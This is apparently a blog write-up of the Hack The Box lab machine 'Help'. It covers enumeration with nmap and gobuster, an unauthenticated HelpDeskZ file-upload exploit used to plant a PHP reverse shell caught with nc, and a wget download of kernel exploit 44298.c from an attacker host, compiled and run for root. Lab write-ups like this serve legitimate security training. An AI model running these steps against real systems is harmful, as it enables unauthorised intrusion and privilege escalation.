HTB Help — Walkthrough

So let’s start enumeration with nmap scan

root@ArmourInfosec:/ nmap -sV 10.10.10.121
Nmap scan report for 10.10.10.121 (10.10.10.121)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s visit on port number 80 and see what’s going on there

just Apache default index file nothing else

lets try gobuster with a small wordlist

root@ArmourInfosec:/ gobuster -u http://10.10.10.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.121/
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/01 08:45:18 Starting gobuster
=====================================================
/support (Status: 301)
/javascript (Status: 301)
=====================================================
2019/05/01 08:45:50 Finished
=====================================================

When we visit http://10.10.10.121/support, there is the “HelpDeskZ :: Support Ticket System

Ok so search if there is any exploit for it

root@ArmourInfosec:/ searchsploit helpdeskz

Arbitary file upload looks interesting because it’s unauthenticated

Let’s try to exploit it

According to the exploit when we upload a ticket with php or some of the other extension files it shows “File is not allowed” but the file is uploaded and save to a special location under “http://10.10.10.121/support/uploads/tickets” with a encrypted name and the link we can get by the exploit so lets try I’m going to upload php reverse shell as “1.php” (remember to change the IP and Port in shell file if you are also using reverse shell), visit

http://10.10.10.121/support/?v=submit_ticket&action=confirmation

file all fields and then select the shell file and click upload it shows “File is not allowed”

then we run the exploit

root@ArmourInfosec:/ python 40300.py http://10.10.10.121/support/uploads/tickets/ 1.php
root@ArmourInfosec:/ nc -lvp 4444
$ cd /home/help$ cat user.txt

We got the user, for root first let’s have tty shell for that i follow the guif.re linux eop so a simple command

$ python -c ‘import pty;pty.spawn(“/bin/bash”)’

We got the tty shell

Now let’s gather some information about the machine like kernel version etc.

So for that

help@help:/$ uname -a
So it’s kernel version is 4.4.0–116, let’s find some exploits for this
root@ArmourInfosec:/ searchsploit linux 4.4.0–116
Here is a Local Privilege Escalation exploit

Let’s upload it on the victim machine I will do it with web server service

In Attacker machine

root@ArmourInfosec:/ python -m SimpleHTTPServer 80

In Victim machine

help@help:/$ cd /tmphelp@help:/$ wget http://<Attacker_IP>/44298.c
help@help:/$ gcc 44298.chelp@help:/$ ./a.out
As soon as you run it you will get root user
help@help:/$ cd /roothelp@help:/$ cat root.txt

And you got the root!!!!!!!!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

What the helpdeskz exploit doing ?

the system is saving invalid file to the tickets directory with a special name as it is taking current time and converting it to string then adding it with filename and generating its md5hash and then saving file with this name so the script is just reversing it and giving us the exaxt link where the response is “200 FOUND”.

--

--

--

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Rise of The Samurai Doge 3D Voxels

Java 8 Important New Feature

2020 Ops Incidents: The Year in Review

Creating an AKS Cluster With Application Gateway (AGIC)

Friendly Algorithm for Beginners

Top 10 software development blogs you should follow

Upload Files Directly To S3 Using Paperclip And Dropzone.js

How to Remove List Line-separator in SwiftUI

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

Pickle Rick — TryHackMe Writeup

Solidstate — HTB

XposedAPI — OffSec Proving Grounds Lab Write-Up

Advantages of Wombat compared to other stableswaps